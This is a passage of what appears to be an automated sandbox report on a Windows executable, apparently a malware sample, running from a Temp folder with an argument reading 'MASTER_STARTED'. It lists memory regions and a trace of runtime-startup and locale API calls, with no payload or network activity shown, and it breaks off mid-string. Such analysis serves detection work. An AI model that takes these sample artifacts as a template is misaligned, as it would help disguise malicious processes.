name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 875 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 876 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 877 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 878 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 879 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 880 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 881 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 882 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 883 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 884 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 885 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 
0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 886 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 887 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 888 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 890 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 891 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 892 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 893 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 894 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 895 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 896 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 897 start_va = 0x11a0000 end_va = 
0x125ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1047 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1048 start_va = 0x11a0000 end_va = 0x121ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1049 start_va = 0x1250000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001250000" filename = "" Region: id = 1074 start_va = 0x1260000 end_va = 0x133efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1075 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1076 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1077 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 15 os_tid = 0xb50 [0095.295] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x77526c00, dwHighDateTime=0x1d440a9)) [0095.295] GetCurrentProcessId () returned 0xb4c [0095.295] GetCurrentThreadId () returned 0xb50 [0095.295] GetTickCount () returned 0x22f3a [0095.295] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15208387719) returned 1 [0095.295] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0095.295] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0095.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0095.296] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0095.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0095.297] GetCurrentThreadId () returned 0xb50 [0095.297] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x12507d0)) [0095.298] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0095.298] GetFileType (hFile=0x3) returned 0x0 [0095.298] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0095.298] GetFileType (hFile=0x7) returned 0x0 [0095.298] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0095.298] GetFileType (hFile=0xb) returned 0x0 [0095.298] SetHandleCount (uNumber=0x20) returned 0x20 [0095.298] GetCommandLineA () 
returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0095.298] GetEnvironmentStringsW () returned 0x1afc98* [0095.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1033 [0095.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=C:=C:\\Users\\EEBsYm5\\Desktop", cchWideChar=1033, lpMultiByteStr=0x12511f8, cbMultiByte=1033, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=C:=C:\\Users\\EEBsYm5\\Desktop", lpUsedDefaultChar=0x0) returned 1033 [0095.298] FreeEnvironmentStringsW (penv=0x1afc98) returned 1 [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] GetACP () returned 0x4e4 [0095.298] GetLastError () returned 0x6 [0095.298] SetLastError (dwErrCode=0x6) [0095.298] IsValidCodePage (CodePage=0x4e4) returned 1 [0095.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0095.299] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0095.299] GetLastError () returned 0x6 [0095.299] SetLastError (dwErrCode=0x6) [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0095.299] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0095.299] GetLastError () returned 0x6 [0095.299] SetLastError (dwErrCode=0x6) [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ") returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0095.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x91\xfd\xfd\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0095.300] GetLastError () returned 0x6 [0095.300] SetLastError (dwErrCode=0x6) [0095.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0095.300] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ") returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0095.300] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿƂﳺശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0095.300] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\